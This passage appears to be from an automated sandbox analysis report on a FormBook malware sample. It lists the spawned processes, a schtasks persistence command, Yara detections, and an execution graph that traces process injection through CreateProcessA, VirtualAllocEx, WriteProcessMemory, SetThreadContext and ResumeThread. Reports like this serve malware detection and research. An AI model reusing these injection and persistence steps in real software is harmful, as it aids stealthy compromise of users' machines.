                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:02:42:42
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff7b93d0000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:02:42:52
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
                                                                Imagebase:0x1a0000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:02:42:52
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff704000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:02:42:52
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0xee0000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:02:42:55
                                                                Start date:09/12/2024
                                                                Path:C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe"
                                                                Imagebase:0xdf0000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4781302763.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Has exited:false

                                                                General

                                                                Target ID:19
                                                                Start time:02:42:56
                                                                Start date:09/12/2024
                                                                Path:C:\Windows\SysWOW64\systray.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\systray.exe"
                                                                Imagebase:0xc10000
                                                                File size:9'728 bytes
                                                                MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4781597517.0000000004690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4781361365.0000000004640000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4775040528.0000000000AB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Has exited:false

                                                                General

                                                                Target ID:20
                                                                Start time:02:43:10
                                                                Start date:09/12/2024
                                                                Path:C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe"
                                                                Imagebase:0xdf0000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:23
                                                                Start time:02:43:22
                                                                Start date:09/12/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff6b1600000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:11.7%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:5.6%
                                                                  Total number of Nodes:161
                                                                  Total number of Limit Nodes:9
                                                                  execution_graph 34310 9441100 34311 944128b 34310->34311 34312 9441126 34310->34312 34312->34311 34315 9441380 PostMessageW 34312->34315 34317 944137a PostMessageW 34312->34317 34316 94413ec 34315->34316 34316->34312 34318 94413ec 34317->34318 34318->34312 34497 949cf0 34498 949d12 34497->34498 34501 949b6c 34498->34501 34500 949d69 34502 949b77 34501->34502 34505 949b7c 34502->34505 34504 94a342 34504->34500 34506 949b87 34505->34506 34509 949b9c 34506->34509 34508 94a58d 34508->34504 34510 949ba1 34509->34510 34513 949bcc 34510->34513 34512 94a662 34512->34508 34514 949bd7 34513->34514 34517 949bfc 34514->34517 34516 94a774 34516->34512 34518 949c07 34517->34518 34521 94d420 34518->34521 34520 94d598 34520->34516 34522 94d42b 34521->34522 34523 94f01a 34522->34523 34525 94f078 34522->34525 34523->34520 34526 94f0bb 34525->34526 34527 94f0c6 KiUserCallbackDispatcher 34526->34527 34528 94f0f0 34526->34528 34527->34528 34528->34523 34358 966d073 34359 966ce6c 34358->34359 34360 966ce7b 34359->34360 34363 966fce8 34359->34363 34378 966fcf8 34359->34378 34364 966fd12 34363->34364 34366 966fd36 34364->34366 34393 944018c 34364->34393 34398 9440647 34364->34398 34403 9440106 34364->34403 34407 94402f9 34364->34407 34412 9440798 34364->34412 34416 944019f 34364->34416 34421 944029d 34364->34421 34426 9440912 34364->34426 34430 9440530 34364->34430 34435 9440754 34364->34435 34439 94404cb 34364->34439 34444 944034c 34364->34444 34366->34359 34379 966fd12 34378->34379 34380 9440106 2 API calls 34379->34380 34381 9440647 2 API calls 34379->34381 34382 944018c 2 API calls 34379->34382 34383 944034c 2 API calls 34379->34383 34384 94404cb 2 API calls 34379->34384 34385 9440754 2 API calls 34379->34385 34386 9440530 2 API calls 34379->34386 34387 9440912 2 API calls 34379->34387 34388 966fd36 34379->34388 34389 944029d 2 API calls 34379->34389 34390 944019f 2 API calls 34379->34390 34391 9440798 2 API calls 34379->34391 34392 94402f9 2 API calls 34379->34392 34380->34388 34381->34388 34382->34388 34383->34388 34384->34388 34385->34388 34386->34388 34387->34388 34388->34359 34389->34388 34390->34388 34391->34388 34392->34388 34394 9440199 34393->34394 34449 966c140 34394->34449 34453 966c148 34394->34453 34395 9440224 34399 94401b6 34398->34399 34399->34398 34400 9440174 34399->34400 34457 966c7c1 34399->34457 34461 966c7c8 34399->34461 34465 966ca44 34403->34465 34469 966ca50 34403->34469 34408 9440297 34407->34408 34409 9440224 34407->34409 34410 966c140 ResumeThread 34408->34410 34411 966c148 ResumeThread 34408->34411 34409->34366 34410->34409 34411->34409 34414 966c7c1 WriteProcessMemory 34412->34414 34415 966c7c8 WriteProcessMemory 34412->34415 34413 9440174 34413->34366 34414->34413 34415->34413 34417 94401a5 34416->34417 34418 9440174 34417->34418 34419 966c7c1 WriteProcessMemory 34417->34419 34420 966c7c8 WriteProcessMemory 34417->34420 34419->34417 34420->34417 34422 94402b5 34421->34422 34424 966c140 ResumeThread 34422->34424 34425 966c148 ResumeThread 34422->34425 34423 9440224 34424->34423 34425->34423 34473 966c1f0 34426->34473 34477 966c1f8 34426->34477 34427 944092c 34431 94407e5 34430->34431 34432 9440174 34430->34432 34433 966c1f0 Wow64SetThreadContext 34431->34433 34434 966c1f8 Wow64SetThreadContext 34431->34434 34433->34432 34434->34432 34437 966c7c1 WriteProcessMemory 34435->34437 34438 966c7c8 WriteProcessMemory 34435->34438 34436 9440778 34437->34436 34438->34436 34440 94406f0 34439->34440 34481 966c701 34440->34481 34485 966c708 34440->34485 34441 9440174 34441->34366 34445 9440352 34444->34445 34489 966c8b8 34445->34489 34493 966c8b0 34445->34493 34446 9440375 34446->34366 34450 966c188 ResumeThread 34449->34450 34452 966c1b9 34450->34452 34452->34395 34454 966c188 ResumeThread 34453->34454 34456 966c1b9 34454->34456 34456->34395 34458 966c810 WriteProcessMemory 34457->34458 34460 966c867 34458->34460 34460->34399 34462 966c810 WriteProcessMemory 34461->34462 34464 966c867 34462->34464 34464->34399 34466 966ca50 CreateProcessA 34465->34466 34468 966cc9b 34466->34468 34470 966cad9 CreateProcessA 34469->34470 34472 966cc9b 34470->34472 34474 966c23d Wow64SetThreadContext 34473->34474 34476 966c285 34474->34476 34476->34427 34478 966c23d Wow64SetThreadContext 34477->34478 34480 966c285 34478->34480 34480->34427 34482 966c748 VirtualAllocEx 34481->34482 34484 966c785 34482->34484 34484->34441 34486 966c748 VirtualAllocEx 34485->34486 34488 966c785 34486->34488 34488->34441 34490 966c903 ReadProcessMemory 34489->34490 34492 966c947 34490->34492 34492->34446 34494 966c903 ReadProcessMemory 34493->34494 34496 966c947 34494->34496 34496->34446 34319 7c88980 34320 7c889ba 34319->34320 34321 7c88a4b 34320->34321 34322 7c88a36 34320->34322 34324 7c88314 4 API calls 34321->34324 34327 7c88314 34322->34327 34326 7c88a5a 34324->34326 34328 7c8831f 34327->34328 34329 7c88a41 34328->34329 34333 7c89440 34328->34333 34340 7c89442 34328->34340 34348 7c89431 34328->34348 34355 7c8836c 34333->34355 34336 7c89467 34336->34329 34337 7c8948a CreateIconFromResourceEx 34339 7c8950e 34337->34339 34339->34329 34341 7c8836c CreateIconFromResourceEx 34340->34341 34345 7c89438 34340->34345 34341->34345 34342 7c89467 34342->34329 34343 7c8948a CreateIconFromResourceEx 34347 7c8950e 34343->34347 34345->34342 34345->34343 34346 7c8836c CreateIconFromResourceEx 34345->34346 34346->34345 34347->34329 34350 7c89438 34348->34350 34349 7c8836c CreateIconFromResourceEx 34349->34350 34350->34349 34351 7c89467 34350->34351 34352 7c8948a CreateIconFromResourceEx 34350->34352 34351->34329 34354 7c8950e 34352->34354 34354->34329 34356 7c89490 CreateIconFromResourceEx 34355->34356 34357 7c89438 34356->34357 34357->34333 34357->34336 34357->34337

                                                                  Executed Functions

                                                                  Function 00949CE0 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 129 949ce0-949d10 131 949d17-949d54 129->131 132 949d12 129->132 133 949d5e-949d64 call 949b6c 131->133 132->131 135 949d69-949df4 133->135 142 949df7 135->142 143 949dfe-949e1a 142->143 144 949e23-949e24 143->144 145 949e1c 143->145 155 94a121-94a122 144->155 145->142 145->144 146 94a057-94a086 145->146 147 94a137 145->147 148 94a193-94a1ee 145->148 149 94a1f3-94a1f8 145->149 150 949e9c-949ee3 145->150 151 94a17e-94a191 145->151 152 949f5f-949f96 145->152 153 949f9b-94a052 145->153 154 949e60-949e97 145->154 145->155 156 94a0a3-94a104 145->156 157 949ee8-949f5a 145->157 158 949e29-949e5e 145->158 159 94a109-94a11c 145->159 160 94a169-94a17c 145->160 161 94a08b-94a09e 145->161 146->143 163 94a13e-94a15a 147->163 148->163 162 94a1fa-94a200 149->162 150->143 151->163 152->143 153->143 154->143 155->162 156->143 157->143 158->143 159->143 160->163 161->143 166 94a163-94a164 163->166 167 94a15c 163->167 166->149 167->147 167->148 167->149 167->151 167->160 167->166
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: XC
                                                                  • API String ID: 0-3125431876
                                                                  • Opcode ID: 2892d8253ecf79d3062eb32e96dea83f2b62cd96284d8e02579025dfaf76c07a
                                                                  • Instruction ID: 87b868254b73dfc31f7483fb792928e858f219241dd7c2b6670a3bbf9c66358b
                                                                  • Opcode Fuzzy Hash: 2892d8253ecf79d3062eb32e96dea83f2b62cd96284d8e02579025dfaf76c07a
                                                                  • Instruction Fuzzy Hash: 5CE1E574E05218CFDB54CFA9D984A9EBBB2FF89300F1084AAD50AEB364DB345942CF15
                                                                  Function 00949CF0 Relevance: 1.6, Strings: 1, Instructions: 322COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 196 949cf0-949d10 197 949d17-949d64 call 949b6c 196->197 198 949d12 196->198 201 949d69-949df4 197->201 198->197 208 949df7 201->208 209 949dfe-949e1a 208->209 210 949e23-949e24 209->210 211 949e1c 209->211 221 94a121-94a122 210->221 211->208 211->210 212 94a057-94a086 211->212 213 94a137 211->213 214 94a193-94a1ee 211->214 215 94a1f3-94a1f8 211->215 216 949e9c-949ee3 211->216 217 94a17e-94a191 211->217 218 949f5f-949f96 211->218 219 949f9b-94a052 211->219 220 949e60-949e97 211->220 211->221 222 94a0a3-94a104 211->222 223 949ee8-949f5a 211->223 224 949e29-949e5e 211->224 225 94a109-94a11c 211->225 226 94a169-94a17c 211->226 227 94a08b-94a09e 211->227 212->209 229 94a13e-94a15a 213->229 214->229 228 94a1fa-94a200 215->228 216->209 217->229 218->209 219->209 220->209 221->228 222->209 223->209 224->209 225->209 226->229 227->209 232 94a163-94a164 229->232 233 94a15c 229->233 232->215 233->213 233->214 233->215 233->217 233->226 233->232
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: XC
                                                                  • API String ID: 0-3125431876
                                                                  • Opcode ID: f6196b6cd0b5ee51d0680235bbb6abc9630f3f4d33cbbe01d0d55bb0b3de25af
                                                                  • Instruction ID: e137779614cc9425c3de42d266ed3f9ffdc913d70265519681a62cfa47db5340
                                                                  • Opcode Fuzzy Hash: f6196b6cd0b5ee51d0680235bbb6abc9630f3f4d33cbbe01d0d55bb0b3de25af
                                                                  • Instruction Fuzzy Hash: 7CE1E474E05218CFDB54CFA9D984A9EBBB2FF89300F10846AD50AEB364DB349942CF11
                                                                  Function 00941B6A Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: a7E
                                                                  • API String ID: 0-4110136650
                                                                  • Opcode ID: b79e0096bb1b7fc31b7d95c32ee1a0741d8b9cbf067e225866f65a529f169a10
                                                                  • Instruction ID: 5c97c092222dd5ab333f13f8cd176e77a0ca631c8e29fc8937f25fa27bc8cdb5
                                                                  • Opcode Fuzzy Hash: b79e0096bb1b7fc31b7d95c32ee1a0741d8b9cbf067e225866f65a529f169a10
                                                                  • Instruction Fuzzy Hash: A5610974E0860A8FDB48CFA5C4409AEFBF2EF89300F24946AD419A7265D7385A81CF94
                                                                  Function 07C88314 Relevance: .7, Instructions: 652COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 825f06058c22f21ec6615eaec26b78edff44e27b2cea431d5cedfbb513cb1bb5
                                                                  • Instruction ID: 0a084b57771b6726fe4a868b1dd0fb239c3e4d589818598c9e7b49ad07fceeb0
                                                                  • Opcode Fuzzy Hash: 825f06058c22f21ec6615eaec26b78edff44e27b2cea431d5cedfbb513cb1bb5
                                                                  • Instruction Fuzzy Hash: 2D427EB0A10219CFDB54EFA9C89079EBBF2BF88304F14856AD009AB395DB349D45CF91
                                                                  Function 09441870 Relevance: .4, Instructions: 424COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6446c12f14cb97db456f08f45ba4d13b7db835bcc2dda50b7fe868ac7f2e8d1f
                                                                  • Instruction ID: ba046ebf12471b4e1ad4bd9b70bfb61bd280b3ca047d82bf0f1168784a730e8e
                                                                  • Opcode Fuzzy Hash: 6446c12f14cb97db456f08f45ba4d13b7db835bcc2dda50b7fe868ac7f2e8d1f
                                                                  • Instruction Fuzzy Hash: 0BF1E0707056418FE715DF75C860BAAB7F6AF8A304F1484AEE146CB391DB35D842CB61
                                                                  Function 07C88A68 Relevance: .3, Instructions: 284COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f99fb22fdf59f582964f7cbdd960c0b4e8a8f1ba26623273e8cba936b30d544c
                                                                  • Instruction ID: 290a8af158af7a9696894852755698e2f3a48369c8bf007411dc3aebf58167b7
                                                                  • Opcode Fuzzy Hash: f99fb22fdf59f582964f7cbdd960c0b4e8a8f1ba26623273e8cba936b30d544c
                                                                  • Instruction Fuzzy Hash: EBC16CB5E10255CFDB54EFA5C88079EBBF2BF88304F54C1AAD409AB255DB30A985CF50
                                                                  Function 00941362 Relevance: .2, Instructions: 236COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a399b7253ef1d079fd892f94ee56deaaa8d914679bbec40e821a54d0dfab8abe
                                                                  • Instruction ID: 9161096f606a0f01d8aebbf7097a2dd20a5ad357815cda10e2a0d30ee5d7027e
                                                                  • Opcode Fuzzy Hash: a399b7253ef1d079fd892f94ee56deaaa8d914679bbec40e821a54d0dfab8abe
                                                                  • Instruction Fuzzy Hash: 1AA12874E152498FCB04CFA9C884AEEFBF2FF89300F24846AD519AB265D7349946CF51
                                                                  Function 009413F0 Relevance: .2, Instructions: 195COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cdbf1ef14ce725ddb23296261f2bac94ede99e399736f2cd9f5b232a9eab25bf
                                                                  • Instruction ID: 8fa8055c1aef1cc150d28862a7bc22482f3dcd6f3f22933bb79223a22708edb2
                                                                  • Opcode Fuzzy Hash: cdbf1ef14ce725ddb23296261f2bac94ede99e399736f2cd9f5b232a9eab25bf
                                                                  • Instruction Fuzzy Hash: 7D81C674E112098FDB08CFAAC984A9EFBB2FF89300F24952AD519BB364D7349945CF54
                                                                  Function 0094A290 Relevance: .2, Instructions: 172COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27e8b72f963ca39db0002b1c4ef15c6d6281ef53060ce4a16a2f9b3cb7fc126e
                                                                  • Instruction ID: d5c9be39657728b80185b91bf2115499cf50c5857243809a46f51125ac04c14d
                                                                  • Opcode Fuzzy Hash: 27e8b72f963ca39db0002b1c4ef15c6d6281ef53060ce4a16a2f9b3cb7fc126e
                                                                  • Instruction Fuzzy Hash: E0719E74E002089FDB44DFAAD954AEDBBF2FF88301F24816AE919A7365DB311941CF51
                                                                  Function 0094A259 Relevance: .2, Instructions: 170COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f59d58550911ee7caf87cae203e1b3ab83e08afc98d4c2f8e8139e35092a783e
                                                                  • Instruction ID: 0613a129a83c63671ba490e340935289b6e169a765287a83f8c357a25aa9f397
                                                                  • Opcode Fuzzy Hash: f59d58550911ee7caf87cae203e1b3ab83e08afc98d4c2f8e8139e35092a783e
                                                                  • Instruction Fuzzy Hash: 23719D74E01208DFDB44DFAAD954AADBBF2FF88300F24816AE919AB365DB311941CF51
                                                                  Function 00949B6C Relevance: .2, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3f06196c1be984def539f9eebb20abb20e7292d91368a10f32af21ddd29c007
                                                                  • Instruction ID: 97eb284d529316f9e338fd32f3c9629f930199d752837c6c9a5e3ed85bc4fa30
                                                                  • Opcode Fuzzy Hash: d3f06196c1be984def539f9eebb20abb20e7292d91368a10f32af21ddd29c007
                                                                  • Instruction Fuzzy Hash: 9A718D74E00208DFDB48DFAAD954AADBBF2FF88300F24816AE919A7365DB315941CF51
                                                                  Function 009434D8 Relevance: .1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a5ed20b27d75e0335fc7d1e1e7a73c8fdfa53bc37e429b64f23586d5ccc4f4c
                                                                  • Instruction ID: 080ff9fc0f97d8f2117c399a44e2e0898badffee8ad7d67944bbd74399212d2a
                                                                  • Opcode Fuzzy Hash: 2a5ed20b27d75e0335fc7d1e1e7a73c8fdfa53bc37e429b64f23586d5ccc4f4c
                                                                  • Instruction Fuzzy Hash: 2241A270E192868FCB15CF75C8949AEBFB2FF85300B14C4AED4459B2A2D7348A42CF91
                                                                  Function 009425E1 Relevance: .1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3481b561edbbca3140a4e9cd58b90b318660aa55b13636eb55396c36afc5250d
                                                                  • Instruction ID: beb71ae042e938c56d831b978682d683ddbdc39e44721463834c1b50fc5f5608
                                                                  • Opcode Fuzzy Hash: 3481b561edbbca3140a4e9cd58b90b318660aa55b13636eb55396c36afc5250d
                                                                  • Instruction Fuzzy Hash: D231E771E006588BDB18CFABD9547DEFBB2AFC9310F14C0AAD408AB264DB751945CF50
                                                                  Function 094404A6 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7811d8ef687b0d1a236437c04a860b454a966a47ee6208599784287fc056906b
                                                                  • Instruction ID: 1b34bdd3387e92f1e5a5f3cc39b4d87603c8211cae53a77727d5160091d519c7
                                                                  • Opcode Fuzzy Hash: 7811d8ef687b0d1a236437c04a860b454a966a47ee6208599784287fc056906b
                                                                  • Instruction Fuzzy Hash: D4D0A974D4E000EFC700BF60D5152F8BBBCA71B344F0030A6460AA3601EA328A228B28
                                                                  Function 09440438 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14a83ab77d5c45c17e4461fc865afef0ba3a77c5b072b0240b140583137fcbe4
                                                                  • Instruction ID: 3bf32d3021ea5d97dd674b43b9bd0a80aa170b97cd2ba72638de97b7ee94a137
                                                                  • Opcode Fuzzy Hash: 14a83ab77d5c45c17e4461fc865afef0ba3a77c5b072b0240b140583137fcbe4
                                                                  • Instruction Fuzzy Hash: 28A00200D4D0D18CE3010D9000220F1EB3C450F285F04348243CE374135503D123615C
                                                                  Function 0966CA44 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
